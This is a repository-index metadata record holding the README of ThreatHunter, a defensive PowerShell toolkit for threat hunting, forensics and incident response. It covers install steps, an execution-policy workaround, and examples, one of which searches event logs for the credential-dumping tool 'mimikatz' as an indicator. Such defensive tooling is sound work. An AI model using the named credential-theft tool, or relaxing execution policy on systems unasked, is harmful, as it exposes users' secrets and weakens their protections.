{"id":50736353,"url":"https://github.com/blwhit/threathunter","last_synced_at":"2026-06-10T14:01:07.874Z","repository":{"id":313223464,"uuid":"1050562898","full_name":"blwhit/ThreatHunter","owner":"blwhit","description":"Advanced PowerShell DFIR module for forensic analysis, threat hunting, and cmdline investigation in Windows.","archived":false,"fork":false,"pushed_at":"2026-01-11T19:52:51.000Z","size":1131,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-01-11T23:37:50.044Z","etag":null,"topics":["cybersecurity","dfir","digital-forensics","evtx-analysis","forensic-analysis","forensics","incident-response","malware-detection","powershell","security","threat-hunting","virustotal","windows"],"latest_commit_sha":null,"homepage":"https://blakekwhite.com","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/blwhit.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-04T15:53:33.000Z","updated_at":"2026-01-11T19:52:55.000Z","dependencies_parsed_at":null,"dependency_job_id":"acc0473e-70cb-428a-afb7-c3af2c892c7f","html_url":"https://github.com/blwhit/ThreatHunter","commit_stats":null,"previous_names":["blwhit/ps-dfir-hunter","blwhit/ps-dfir-threathunter","blwhit/threathunter"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/blwhit/ThreatHunter","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blwhit%2FThreatHunter","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blwhit%2FThreatHunter/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blwhit%2FThreatHunter/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blwhit%2FThreatHunter/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/blwhit","download_url":"https://codeload.github.com/blwhit/ThreatHunter/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blwhit%2FThreatHunter/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34155422,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-10T02:00:07.152Z","response_time":89,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","dfir","digital-forensics","evtx-analysis","forensic-analysis","forensics","incident-response","malware-detection","powershell","security","threat-hunting","virustotal","windows"],"created_at":"2026-06-10T14:01:05.799Z","updated_at":"2026-06-10T14:01:07.865Z","avatar_url":"https://github.com/blwhit.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cimg width=\"2000\" height=\"1000\" alt=\"threathunter\" src=\"https://github.com/user-attachments/assets/3af47e17-aad3-4c6d-b89d-c3ac3a4d543d\" /\u003e\n\n\n\n## Overview\n\nThreatHunter is a comprehensive PowerShell toolkit designed for threat hunting, digital forensics, and incident response (DFIR). \n\nIt provides a suite of hunt functions to detect persistence mechanisms, analyze system artifacts, search event logs, and generate detailed forensic reports - all through PowerShell on the command line.\n\n**[Read the Wiki](../../wiki)**\n\n---\n\n## 🎯 Core Capabilities\n\n| Function | Purpose |\n|----------|---------|\n| **Hunt-ForensicDump** | Forensic collection with interactive HTML reporting |\n| **Hunt-Persistence** | Detect 60+ persistence techniques (registry, services, WMI, tasks) |\n| **Hunt-Logs** | Event log analysis with caching and IOC detection |\n| **Hunt-Browser** | Browser history/extension analysis with tool integration |\n| **Hunt-Files** | File hunting by time, content, hashes, and ADS |\n| **Hunt-Registry** | Registry search, autoruns, and Run MRU (ClickFix detection) |\n| **Hunt-Services** | Service enumeration with svchost DLL resolution |\n| **Hunt-Tasks** | Scheduled task analysis with privilege detection |\n| **Hunt-VirusTotal** | VirusTotal API integration with auto-upload |\n\n\n---\n\n## 🔧 Installation\n\n### Option 1: Install the Module from PS Gallery\n```powershell\nInstall-Module ThreatHunter -Force -AllowClobber\n\nImport-Module ThreatHunter\n```\n\n#### Install Module for Temporary Usage\n```powershell\nInstall-Module ThreatHunter -Scope CurrentUser\n\nImport-Module ThreatHunter\n\n# When Done\nUninstall-Module ThreatHunter\n```\n\n### Option 2: Install from Git\n```powershell\ngit clone https://github.com/blwhit/ThreatHunter.git\n\ncd .\\ThreatHunter\\\n\nImport-Module .\\ThreatHunter.psd1\n```\n\n### Option 3: Install from Web Request\n```powershell\nInvoke-WebRequest -Uri \"https://raw.githubusercontent.com/blwhit/ThreatHunter/refs/heads/main/ThreatHunter.psm1\" -OutFile \"ThreatHunter.psm1\"\n\nImport-Module \".\\ThreatHunter.psm1\"\n```\n\n### Troubleshooting Errors:\n\n#### [Problem] Execution Policy is Blocking Module\n```\nImport-Module : File 'ThreatHunter.psm1' cannot be loaded because running scripts is disabled on this system.\n```\n\n#### [Fix] Temporarily set execution policy for the current PowerShell session.\n```powershell\nSet-ExecutionPolicy Unrestricted -Scope Process\n```\n\n---\n\n## 🚀 Quick Examples\n```powershell\n\n# Quick forensic dump and Export EVTZ to ZIP\nHunt-ForensicDump -StartDate \"3D\" -LoadBrowserTool -SkipConfirmation -ExportLogs\n\n# Hunt for persistence\nHunt-Persistence -Aggressive\n\n# Search all event logs for IOCs\nHunt-Logs -StartDate \"7D\" -Search \"mimikatz\"\n\n# Pull all browser history\nHunt-Browser -LoadTool -SkipConfirmation\n```\n\n---\n\n## 📋 Requirements\n\n- PowerShell 5.0+\n- Windows 7/Server 2008 R2 or later\n- Administrator privileges (recommended)\n\n---\n\n## ⚡ Key Features\n\n- **Pure PowerShell** - No compiled binaries or external dependencies\n- **Interactive HTML Reports** - Single-file forensic reports with dark/light themes\n- **Smart Caching** - Browser and log caching for fast repeated searches\n- **Multiple Outputs** - Console, CSV, PowerShell objects\n- **Date Filtering** - Flexible relative and absolute date formats\n- **MITRE ATT\u0026CK** - Persistence techniques mapped to framework\n- **ClickFix Detection** - Analyze Win+R commands for social engineering attacks\n- **Offline Analysis** - Process exported EVTX logs and CSV files\n\n---\n\n## 📚 Documentation\n\n- **[Home](../../wiki/Home)** - Module overview and quick start\n- **[Hunt-ForensicDump](../../wiki/Hunt-ForensicDump)** - Master forensic collection\n- **[Hunt-Persistence](../../wiki/Hunt-Persistence)** - 60+ persistence techniques\n- **[Hunt-Logs](../../wiki/Hunt-Logs)** - Event log hunting\n- **[Hunt-Browser](../../wiki/Hunt-Browser)** - Browser analysis\n- **[Hunt-Files](../../wiki/Hunt-Files)** - File system hunting\n- **[Hunt-Registry](../../wiki/Hunt-Registry)** - Registry analysis\n- **[Hunt-Services](../../wiki/Hunt-Services)** - Service enumeration\n- **[Hunt-Tasks](../../wiki/Hunt-Tasks)** - Scheduled task analysis\n- **[Hunt-VirusTotal](../../wiki/Hunt-VirusTotal)** - VirusTotal integration\n\n\n---\n\n## 🛡️ Use Cases\n\n- **Incident Response** - Quick triage and comprehensive data collection\n- **Threat Hunting** - Proactive search for persistence and IOCs\n- **Forensic Analysis** - Detailed system artifact examination\n\n---\n\n\n## 🔗 Resources\n\n- **PowerShell Gallery**: https://www.powershellgallery.com/packages/ThreatHunter/1.0\n- **Wiki Documentation**: [View the Wiki](../../wiki)\n- **MITRE ATT\u0026CK**: https://attack.mitre.org\n- **Issue Tracker**: [Submit an Issue](../../issues)\n\n---\n\n**Author**: [Blake White]  \n**Version**: 1.0  \n**Last Updated**: Jan 2026\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblwhit%2Fthreathunter","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fblwhit%2Fthreathunter","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblwhit%2Fthreathunter/lists"}